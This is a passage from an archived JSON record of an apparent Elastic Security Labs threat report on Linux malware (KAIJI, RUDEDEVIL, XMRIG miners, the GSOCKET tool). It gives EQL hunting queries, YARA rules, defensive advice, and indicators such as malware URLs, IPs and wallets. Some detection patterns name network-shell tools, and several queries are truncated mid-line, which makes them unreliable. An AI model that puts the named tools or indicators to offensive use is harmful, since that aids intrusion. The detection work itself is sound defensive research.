These queries are used to identify potentially suspicious behavior, but an investigation is required to validate the findings.\r\nEQL queries\r\nUsing the Timeline section of the Security Solution in Kibana under the “Correlation” tab, you can use the below EQL queries to hunt for similar behaviors:\r\nPotential XMRIG Execution\r\nThe following EQL query can be used to hunt for XMRIG executions within your environment.\r\nprocess where event.type == \"start\" and event.action == \"exec\" and (\r\n (\r\n process.args in (\"-a\", \"--algo\") and process.args in (\r\n \"gr\", \"rx/graft\", \"cn/upx2\", \"argon2/chukwav2\", \"cn/ccx\", \"kawpow\", \"rx/keva\", \"cn-pico/tlo\", \"rx/sfx\", \"rx/arq\",\r\n \"rx/0\", \"argon2/chukwa\", \"argon2/ninja\", \"rx/wow\", \"cn/fast\", \"cn/rwz\", \"cn/zls\", \"cn/double\", \"cn/r\", \"cn-pico\",\r\n \"cn/half\", \"cn/2\", \"cn/xao\", \"cn/rto\", \"cn-heavy/tube\", \"cn-heavy/xhv\", \"cn-heavy/0\", \"cn/1\", \"cn-lite/1\",\r\n \"cn-lite/0\", \"cn/0\"\r\n )\r\n ) or\r\n (\r\n process.args == \"--coin\" and process.args in (\"monero\", \"arqma\", \"dero\")\r\n )\r\n) and process.args in (\"-o\", \"--url\")\r\nMSR Write Access Enabled\r\nXMRIG leverages modprobe to enable write access to model-specific registers (MSRs). This activity is abnormal, and should not occur by default.\r\nprocess where event.type == \"start\" and event.action == \"exec\" and process.name == \"modprobe\" and\r\nprocess.args == \"msr\" and process.args == \"allow_writes=on\"\r\nPotential GSOCKET Activity\r\nThis activity is default behavior when deploying GSOCKET through the recommended deployment methods. 
Additionally, several arguments are added to the query to decrease the chances of missing a more customized intrusion through GSOCKET.\r\nprocess where event.type == \"start\" and event.action == \"exec\" and\r\nprocess.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and\r\nprocess.command_line : (\r\n\"*GS_ARGS=*\", \"*gs-netcat*\", \"*gs-sftp*\", \"*gs-mount*\", \"*gs-full-pipe*\", \"*GS_NOINST=*\", \"*GSOCKET_ARGS=*\", \"*GS_DSTDIR=*\r\n)\r\nPotential Process Masquerading via Exec\r\nGSOCKET leverages the exec -a method to run a process under a different name. GSOCKET specifically masquerades as kernel processes, but other malware may masquerade differently.\r\nprocess where event.type == \"start\" and event.action == \"exec\" and\r\nprocess.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and process.args == \"-c\" and process.command_l\r\nRenice or Ulimit Execution\r\nSeveral malware families, including KAIJI and RUDEDEVIL, leverage the renice utility to change the priority of processes or set resource limits for processes. This is commonly used by miner malware to increase the priority of mining processes to maximize the mining performance.\r\nprocess where event.type == \"start\" and event.action == \"exec\" and (\r\n process.name in (\"ulimit\", \"renice\") or (\r\n process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and process.args == \"-c\" and\r\n process.command_line : (\"*ulimit*\", \"*renice*\")\r\n )\r\n)\r\nInexistent Cron(d) Service Started\r\nBoth KAIJI and RUDEDEVIL establish persistence through the creation of a cron(d) service in /etc/init.d/cron(d).\r\nCron, by default, does not use a SysV Init service. 
Execution of a cron(d) service is suspicious, and should be analyzed further.\r\nprocess where event.type == \"start\" and event.action == \"exec\" and\r\n process.name == \"systemctl\" and process.args == \"start\" and process.args in\r\n (\"cron.service\", \"crond.service\", \"cron\", \"crond\")\r\nSuspicious /etc/ Process Execution from KAIJI\r\nThe /etc/ directory is not a commonly used directory for process executions. KAIJI is known to place a binary called 32678 and id.services.conf in the /etc/ directory, to establish persistence and evade detection.\r\nprocess where event.type == \"start\" and event.action == \"exec\" and (process.executable regex \"\"\"/etc/[0-9].*\"\"\" or proces\r\nHidden File Creation in /dev/ directory\r\nCreating hidden files in /dev/ and /dev/shm/ is not inherently malicious; however, this activity should be uncommon. KAIJI, GSOCKET and other malware such as K4SPREADER are known to drop hidden files in these locations.\r\nfile where event.type == \"creation\" and file.path : (\"/dev/shm/.*\", \"/dev/.*\")\r\nSuspicious Process Execution from Parent Executable in /boot/\r\nMalware such as KAIJI and XORDDOS are known to place executable files in the /boot/ directory, and leverage these to establish persistence while attempting to evade detection.\r\nprocess where event.type == \"start\" and event.action == \"exec\" and process.parent.executable : \"/boot/*\"\r\nYARA\r\nElastic Security has created YARA rules to identify this activity. 
Below is the YARA rule to identify the custom Apache2\r\nmalware:\r\nrule Linux_Trojan_Generic {\r\n meta:\r\n author = \"Elastic Security\"\r\n creation_date = \"2024-09-20\"\r\n last_modified = \"2024-09-20\"\r\n os = \"Linux\"\r\n arch = \"x86\"\r\n threat_name = \"Linux.Trojan.Generic\"\r\n reference = \"https://www.elastic.co/security-labs/betting-on-bots\"\r\n license = \"Elastic License v2\"\r\n strings:\r\n $enc1 = { 74 73 0A 1C 1A 54 1A 11 54 0C 18 43 59 5B 3A 11 0B 16 14 10 0C 14 5B }\r\n $enc2 = { 18 1A 1A 1C 09 0D 43 59 0D 1C 01 0D 56 11 0D 14 15 55 18 09 09 15 10 }\r\n $enc3 = { 18 1A 1A 1C 09 0D 54 15 18 17 1E 0C 18 1E 1C 43 59 0B 0C }\r\n $enc4 = { 34 16 03 10 15 15 18 56 4C 57 49 59 51 2E 10 17 1D 16 0E 0A 59 37 }\r\n $key = \"yyyyyyyy\"\r\n condition:\r\n 1 of ($enc*) and $key\r\n}\r\nTo detect GSOCKET, including several of its adjacent tools, we created the following signature:\r\nrule Multi_Hacktool_Gsocket {\r\n meta:\r\n author = \"Elastic Security\"\r\n creation_date = \"2024-09-20\"\r\n last_modified = \"2024-09-23\"\r\n os = \"Linux, MacOS\"\r\n arch = \"x86\"\r\n threat_name = \"Multi.Hacktool.Gsocket\"\r\n reference = \"https://www.elastic.co/security-labs/betting-on-bots\"\r\n license = \"Elastic License v2\"\r\n strings:\r\n $str1 = \"gsocket: gs_funcs not found\"\r\n $str2 = \"/share/gsocket/gs_funcs\"\r\n $str3 = \"$GSOCKET_ARGS\"\r\n $str4 = \"GSOCKET_SECRET\"\r\n $str5 = \"GS_HIJACK_PORTS\"\r\n $str6 = \"sftp -D gs-netcat\"\r\n $str7 = \"GS_NETCAT_BIN\"\r\n $str8 = \"GSOCKET_NO_GREETINGS\"\r\n $str9 = \"GS-NETCAT(1)\"\r\n $str10 = \"GSOCKET_SOCKS_IP\"\r\n $str11 = \"GSOCKET_SOCKS_PORT\"\r\n $str12 = \"gsocket(1)\"\r\n $str13 = \"gs-sftp(1)\"\r\n $str14 = \"gs-mount(1)\"\r\n condition:\r\n 3 of them\r\n}\r\nFinally, the following signature was written to detect the open source Ligolo-ng tool, as we have reason to believe this tool\r\nwas used during this intrusion.\r\nrule Linux_Hacktool_LigoloNG {\r\n meta:\r\n author = \"Elastic 
Security\"\r\n creation_date = \"2024-09-20\"\r\n last_modified = \"2024-09-20\"\r\n os = \"Linux\"\r\n arch = \"x86\"\r\n threat_name = \"Linux.Hacktool.LigoloNG\"\r\n reference = \"https://www.elastic.co/security-labs/betting-on-bots\"\r\n license = \"Elastic License v2\"\r\n strings:\r\n $a = \"https://github.com/nicocha30/ligolo-ng\"\r\n $b = \"@Nicocha30!\"\r\n $c = \"Ligolo-ng %s / %s / %s\"\r\n condition:\r\n all of them\r\n}\r\nDefensive recommendations\r\nTo effectively defend against malware campaigns and minimize the risk of intrusion, it’s crucial to implement a multi-layered approach to security. Here are some key defensive measures you should prioritize:\r\n1. Keep Your Elastic Detection Rules Updated and Enabled: Ensure that your security tools, including any pre-built detection rules, are up to date. Continuous updates allow your systems to detect the latest malware signatures and behaviors.\r\n2. Enable Prevention Mode in Elastic Defend: Configure Elastic Defend in prevention mode to automatically block known threats rather than just alerting on them. Prevention mode ensures proactive defense against malware and exploits.\r\n3. Monitor Alerts and Logs: Regularly monitor alerts, logs, and servers for any signs of suspicious activity. Early detection of unusual behavior can help prevent a small breach from escalating into a full-blown compromise.\r\n4. Conduct Threat Hunting: Proactively investigate your environment for hidden threats that may have evaded detection. Threat hunting can uncover advanced attacks and persistent malware that bypass traditional security measures.\r\n5. Implement Web Application Firewalls (WAFs): Use a WAF to block unauthorized or malicious traffic. A properly configured firewall can prevent many common web attacks.\r\n6. 
Enforce Strong Authentication for SSH: Use public/private key authentication for SSH access to protect against brute force attacks.\r\n7. Write Secure Code: Ensure that all custom software, especially web server technology, follows secure coding practices. Engaging professional security auditors to review your code can help identify and mitigate vulnerabilities before they are exploited.\r\n8. Regularly Patch and Update Systems: Keeping servers, applications, and software up to date is essential to defending against known vulnerabilities. Prompt patching minimizes the risk of being targeted by off-the-shelf exploits.\r\nBy following these recommendations, you can significantly reduce the attack surface and strengthen your defense against ongoing or potential malware threats.\r\nObservations\r\nThe following observables were discussed in this research. These are available for download in STIX or ECS format here.\r\nObservable Type N\r\n72ac2877c9e4cd7d70673c0643eb16805977a9b8d55b6b2e5a6491db565cee1f SHA-256 Sy\r\n82c55c169b6cb5e348be6e202163296b2b5d80fff2be791c21da9a8b84188684 SHA-256 ap\r\n0fede7231267afc03b096ee6c1d3ded479b10ab235e260120bc9f68dd1fc54dd SHA-256 ap\r\n9ee695e55907a99f097c4c0ad4eb24ae5cf3f8215e9904d787817f1becb9449e SHA-256 do\r\n1cdfb522acb1ad0745a4b88f072e40bf9aa113b63030fe002728bac50a46ae79 SHA-256 lin\r\nd0ef2f020082556884361914114429ed82611ef8de09d878431745ccd07c06d8 SHA-256 lin\r\nad36cf59b5eb08799a50e9aece6f12cdfe8620062606ac6684d3b4509acc681b SHA-256 lin\r\n792a84a5bc8530285e2f6eb997054edb3d43460a99a089468e2cf81b5fd5cde6 SHA-256 lin\r\ne19fb249db323d2388e91f92ff0c8a7a169caf34c3bdaf4d3544ce6bfb8b88b4 SHA-256 lin\r\n3847c06f95dd92ec482212116408286986bb4b711e27def446fb4a524611b745 SHA-256 lin\r\nfffee23324813743b8660282ccd745daa6fb058f2bf84b9960f70d888cd33ba0 SHA-256 lin\r\n6d40b58e97c7b4c34f7b5bdac88f46e943e25faa887e0e6ce5f2855008e83f55 SHA-256 lin\r\n0c3442b8c49844a1ee41705a9e4a710ae3c7cde76c69c2eab733366b2aa34814 SHA-256 lin\r\n310973f6f186947cb7cff0e7b46b4645acdd71e90104f334caa88a4fa8ad9988 SHA-256 lin\r\n0d24a2e7da52bad03b0bda45c8435a29c4e1c9b483e425ae71b79fd122598527 SHA-256 lin\r\n36fc8eef2e1574e00ba3cf9e2267d4d295f6e9f138474e3bd85eb4d215f63196 SHA-256 lin\r\n3c25a4406787cc5089e83e00350e49eb9f192d03d69e7a61b780b6828db1344f SHA-256 lin\r\n7c16149db7766c6fd89f28031aa123408228f045e90aa03828c02562d9f9d1d7 SHA-256 lin\r\n09f935acbac36d224acfb809ad82c475d53d74ab505f057f5ac40611d7c3dbe7 SHA-256 l6\r\nea0068702ea65725700b1dad73affe68cf29705c826d12a497dccf92d3cded46 SHA-256 l6\r\n160f232566968ade54ee875def81fc4ca69e5507faae0fceb5bef6139346496a SHA-256 l6\r\n89b60cedc3a4efb02ceaf629d6675ec9541addae4689489f3ab8ec7741ec8055 SHA-256 l6\r\n20899c5e2ecd94b9e0a8d1af0114332c408fb65a6eb3837d4afee000b2a0941b SHA-256 l8\r\n728dce11ffd7eb35f80553d0b2bc82191fe9ff8f0d0750fcca04d0e77d5be28c SHA-256 l8\r\n47ceca049bfcb894c9a229e7234e8146d8aeda6edd1629bc4822ab826b5b9a40 SHA-256 l8\r\ne89f4073490e48aa03ec0256d0bfa6cf9c9ac6feb271a23cb6bc571170d1bcb5 SHA-256 l8\r\nd6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60 SHA-256 hj\r\n54a5c82e4c68c399f56f0af6bde9fb797122239f0ebb8bcdb302e7c4fb02e1de SHA-256 m\r\n9e32be17b25d3a6c00ebbfd03114a0947361b4eaf4b0e9d6349cbb95350bf976 SHA-256 vd\r\nhttp://gcp.pagaelrescate[.]com:8080/ifindyou url ifi\r\nhttp://gcp.pagaelrescate[.]com:8080/cycnet url cy\r\nhttp://gcp.pagaelrescate[.]com:8080/testslot/enviador_slot url 
En\r\nhttp://gcp.pagaelrescate[.]com:8080/t9r/SystemdXC url Sy\r\nhttp://38.54.125[.]192:8080/nginx-rc url ng\r\nhttp://62.72.22[.]91/apache2 url ap\r\nhttp://62.72.22[.]91/apache2v86 url ap\r\nhttp://91.92.241[.]103:8002/gk.php url gk\r\nhttp://hfs.t1linux[.]com:7845/scdsshfk url sc\r\ngcp.pagaelrescate[.]com domain-name\r\nnishabii[.]xyz domain-name\r\n3.147.53[.]183 ipv4-addr\r\n38.54.125[.]192 ipv4-addr\r\n107.178.101[.]245 ipv4-addr\r\n62.72.22[.]91 ipv4-addr\r\n91.92.241[.]103 ipv4-addr\r\n61.160.194[.]160 ipv4-addr\r\n41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL XMR Wallet\r\n42CJPfp1jJ6PXv4cbjXbBRMhp9YUZsXH6V5kEvp7XzNGKLnuTNZQVU9bhxsqBEMstvDwymNSysietQ5VubezYfoq4fT4Ptc XMR Wallet\r\n1CSUkd5FZMis5NDauKLDkcpvvgV1zrBCBz BTC Wallet\r\nReferences\r\nThe following were referenced throughout the above research:\r\nhttps://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html\r\nhttps://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/\r\nhttps://www.fortinet.com/blog/threat-research/multiple-threats-target-adobe-coldfusion-vulnerabilities\r\nhttps://www.aquasec.com/blog/lucifer-ddos-botnet-malware-is-targeting-apache-big-data-stack/\r\nhttps://github.com/hackerschoice/gsocket\r\nSource: https://www.elastic.co/security-labs/betting-on-bots",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.elastic.co/security-labs/betting-on-bots"
	],
	"report_names": [
		"betting-on-bots"
	],
	"threat_actors": [],
	"ts_created_at": 1775791241,
	"ts_updated_at": 1775791338,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/21255dabf13b81070819344ae2b82e9d6ebe0573.pdf",
		"text": "https://archive.orkl.eu/21255dabf13b81070819344ae2b82e9d6ebe0573.txt",
		"img": "https://archive.orkl.eu/21255dabf13b81070819344ae2b82e9d6ebe0573.jpg"
	}
}